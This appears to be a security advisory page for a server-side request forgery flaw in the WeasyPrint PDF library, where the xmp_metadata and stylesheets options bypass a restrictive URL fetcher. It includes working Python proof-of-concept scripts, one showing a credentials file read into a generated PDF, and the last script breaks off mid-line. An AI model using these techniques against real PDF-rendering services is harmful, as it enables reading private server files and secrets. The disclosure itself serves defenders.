medium

CVE-2026-55073

PyPI · weasyprint

Summary

weasyprint Has Server-Side Request Forgery (SSRF)

Severity
medium
CVSS
6.2
CWE
CWE-918
Also known as
GHSA-jf6q-chmf-3h3v
Published
2026-09-09
Updated
2026-09-09

Advisory details

Summary

url_fetcher is WeasyPrint's documented mechanism for restricting resource loading - applications use it to block file://, internal hosts, etc. when rendering untrusted input.

Two write_pdf() channels ignore the document's url_fetcher and build a fresh default URLFetcher() instead. A restrictive fetcher set on HTML() is silently bypassed for:

Applications affected are those that (1) run WeasyPrint server-side, (2) set a restrictive url_fetcher to block file:// or internal hosts, and (3) forward an attacker-influenced URL/path into either parameter - e.g. PDF rendering APIs, invoice/report generators, document SaaS.

Affected versions

All versions through current main - v69.0, commit 2945986160dedd97a7547be03805b667964e422a.

Root cause

select_source() defaults to a fresh fetcher when none is passed (weasyprint/urls.py):

def select_source(guess=None, filename=None, url=None, ..., url_fetcher=None, ...):
    ...
    if url_fetcher is None:
        url_fetcher = URLFetcher()

Five of the seven resource-loading sites thread the document's fetcher correctly:

Two do not — they build a fresh default fetcher instead:

xmp_metadata - pdf/__init__.py calls select_source(url) with no url_fetcher, so the default fetcher runs regardless of what the caller configured:

if options['xmp_metadata']:
    for url in options['xmp_metadata']:
        result = select_source(url)          # no url_fetcher

stylesheets - document.py builds each sheet without passing url_fetcher, and CSS.__init__ then defaults to a fresh URLFetcher():

for css in options['stylesheets'] or []:
    if not hasattr(css, 'matcher'):
        css = CSS(                            # no url_fetcher=html.url_fetcher
            guess=css, media_type=html.media_type,
            font_config=font_config, counter_style=counter_style,
            color_profiles=color_profiles)

Because @import / url() inherit a CSS object's fetcher, the permissive fetcher propagates to the entire import graph - so the bypass is transitive.

Reproduction

Each script defines a Block fetcher that refuses every file://, writes its own fixture to a temp dir, and prints a boolean. True means the restrictive fetcher was bypassed. No external files or network needed.

1 - xmp_metadata= reads a file:// the fetcher blocks

import os, tempfile
from weasyprint import HTML
from weasyprint.urls import URLFetcher

class Block(URLFetcher):
    def fetch(self, url, headers=None):
        if url.lower().startswith('file:'):
            raise ValueError('blocked ' + url)
        return super().fetch(url, headers)

d = tempfile.mkdtemp()
path = os.path.join(d, 'secret.xmp')
open(path, 'wb').write(b'CANARY_XMP_LEAK_7f3a9c')
pdf = HTML(string='<p>hi</p>', url_fetcher=Block()).write_pdf(
    xmp_metadata=['file://' + path], pdf_variant='pdf/a-3b', uncompressed_pdf=True)
print('secret file leaked into PDF:', b'CANARY_XMP_LEAK_7f3a9c' in pdf)
# -> True

(pdf_variant='pdf/a-3b' makes the embedded bytes observable in the output; the read happens regardless of variant.)

2 - stylesheets= applies a blocked file:// sheet (with control)

import os, tempfile
from weasyprint import HTML
from weasyprint.urls import URLFetcher

class Block(URLFetcher):
    def fetch(self, url, headers=None):
        if url.lower().startswith('file:'):
            raise ValueError('blocked ' + url)
        return super().fetch(url, headers)

d = tempfile.mkdtemp()
path = os.path.join(d, 'evil.css')
open(path, 'w').write('@page { size: 1234px 5678px }')

doc = HTML(string='<p>x</p>', url_fetcher=Block()).render(stylesheets=['file://' + path])
p = doc.pages[0]
print('evil.css applied via stylesheets=:', (round(p.width), round(p.height)) == (1234, 5678))
# -> True

# Control: the same sheet via <link rel=stylesheet> is NOT applied (the fetcher blocks it;
# WeasyPrint logs and continues), so the page keeps its default A4 size. This confirms the
# gap is specific to stylesheets= and not a misconfigured fetcher.
ctrl = HTML(string='<link rel="stylesheet" href="file://%s"><p>x</p>' % path,
            url_fetcher=Block()).render()
cp = ctrl.pages[0]
print('control <link> correctly blocked:', (round(cp.width), round(cp.height)) != (1234, 5678))
# -> True

3 - the stylesheets= bypass is transitive

import os, tempfile
from weasyprint import HTML
from weasyprint.urls import URLFetcher

class Block(URLFetcher):
    def fetch(self, url, headers=None):
        if url.lower().startswith('file:'):
            raise ValueError('blocked ' + url)
        return super().fetch(url, headers)

d = tempfile.mkdtemp()
inner = os.path.join(d, 'inner.css')
outer = os.path.join(d, 'outer.css')
open(inner, 'w').write('@page { size: 333px 777px }')
open(outer, 'w').write('@import url("file://%s");' % inner)
doc = HTML(string='<p>x</p>', url_fetcher=Block()).render(stylesheets=['file://' + outer])
p = doc.pages[0]
print('nested @import applied transitively:', (round(p.width), round(p.height)) == (333, 777))
# -> True

4 - xmp_metadata= discloses a credentials file in full

import os, json, tempfile
from weasyprint import HTML
from weasyprint.urls import URLFetcher

class Block(URLFetcher):
    def fetch(self, url, headers=None):
        if url.lower().startswith('file:'):
            raise ValueError('blocked ' + url)
        return super().fetch(url, headers)

creds = {'db_name': 'CANARY_DB_NAME', 'db_password': 'CANARY_PASSWORD_a3f7e9c2',
         'encryption_key': 'CANARY_ENC_KEY_b8d4f6a1', 'secret_key': 'CANARY_SECRET_KEY_c5e9d2b7'}
d = tempfile.mkdtemp()
path = os.path.join(d, 'site_config.json')
json.dump(creds, open(path, 'w'))
pdf = HTML(string='<p>x</p>', url_fetcher=Block()).write_pdf(
    xmp_metadata=['file://' + path], pdf_variant='pdf/a-3b', uncompressed_pdf=True)
print('all credential fields leaked into PDF:', all(v.encode() in pdf for v in creds.values()))
# -> True

An attacker who controls the xmp_metadata path reads any file the rendering process can access and receives its contents in the generated PDF.

5 - scope of the stylesheets= channel (honest bound)

The sheet is applied, but its content does not leak verbatim - CSS comments are stripped during parsing. So this channel is SSRF / resource application, not verbatim disclosure on its own.

import os, tempfile
from weasyprint import HTML
from weasyprint.urls import URLFetcher

class Block(URLFetcher):
    def fetch(self, url, headers=None):
        if url.lower().startswith('file:'):
            raise ValueError('blocked ' + url)
        return super().fetch(url, headers)

d = tempfile.mkdtemp()
path = os.path.join(d, 'secrets.css')
open(path, 'w').write('/* CANARY_SECRET_e2a8c5d4 */\n@page { size: 999px 888px }')
html = HTML(string='<p>x</p>', url_fetcher=Block())
doc = html.render(stylesheets=['file://' + path])
pdf = html.write_pdf(stylesheets=['file://' + path], uncompressed_pdf=True)
p = doc.pages[0]
print('sheet applied (bypass):'

References

Related advisories

Is your project exposed to this? Stateward checks every dependency on every pull request and flags it only if your code actually reaches it.

Check my repo

Summarize with AI

ChatGPTClaudePerplexity

Sources: CISA KEV (public domain), OSV.dev & GitHub Advisory Database (CC-BY-4.0), FIRST EPSS, NVD/CWE (public domain). Served live from the Stateward advisory database.